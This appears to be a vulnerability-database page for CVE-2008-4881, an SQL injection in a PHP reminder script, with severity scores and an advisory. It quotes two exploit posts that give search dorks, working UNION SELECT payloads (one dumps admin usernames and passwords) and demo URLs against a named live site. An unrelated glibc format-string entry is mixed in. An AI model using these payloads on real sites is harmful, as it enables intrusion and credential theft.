CVE-2008-4881
published 2008-11-04CVE-2008-4881: SQL injection vulnerability in tr.php in YourFreeWorld Reminder Service Script allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.98%
57.8th percentile
SQL injection vulnerability in tr.php in YourFreeWorld Reminder Service Script allows remote attackers to execute arbitrary SQL commands via the id parameter.
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rc7c-6m74-6jwx: SQL injection vulnerability in tr
ghsa_unreviewed·2022-05-17
CVE-2008-4881 [HIGH] CWE-89 GHSA-rc7c-6m74-6jwx: SQL injection vulnerability in tr
SQL injection vulnerability in tr.php in YourFreeWorld Reminder Service Script allows remote attackers to execute arbitrary SQL commands via the id parameter.
Red Hat
(32-bit): Integer overflow in the __vstrfmon_l function
vendor_redhat·2008-03-25·CVSS 7.5
CVE-2009-4881 [HIGH] CWE-190 (32-bit): Integer overflow in the __vstrfmon_l function
(32-bit): Integer overflow in the __vstrfmon_l function
Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in the strfmon implementation in the GNU C Library (aka glibc or libc6) before 2.10.1 allows context-dependent attackers to cause a denial of service (application crash) via a crafted format string, as demonstrated by the %99999999999999999999n string, a related issue to CVE-2008-1391.
Statement: Red Hat does not consider this bug to be a security issue. Properly written application should not use arbitrary untrusted data as part of the format string passed to functions as strfmon or printf family functions.
No detection rules found.
Exploit-DB
YourFreeWorld Reminder Service - SQL Injection
exploitdb·2008-11-01
CVE-2008-4881 YourFreeWorld Reminder Service - SQL Injection
YourFreeWorld Reminder Service - SQL Injection
---
Reminder Service ( id ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/reminder.php
DorK : inurl:tr.php?id= Reminder Service
Exploit :
tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Demo :
http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Greetz : All my freind
# milw0rm.com [2008-11-01]
Exploit-DB
YourFreeWorld Banner Management - SQL Injection
exploitdb·2008-11-01
CVE-2008-4900 YourFreeWorld Banner Management - SQL Injection
YourFreeWorld Banner Management - SQL Injection
---
Banner Management (id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/bannermanagementscript.asp
DorK : :)
Exploit :
tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my freind
# milw0rm.com [2008-11-01]
2008-11-04
Published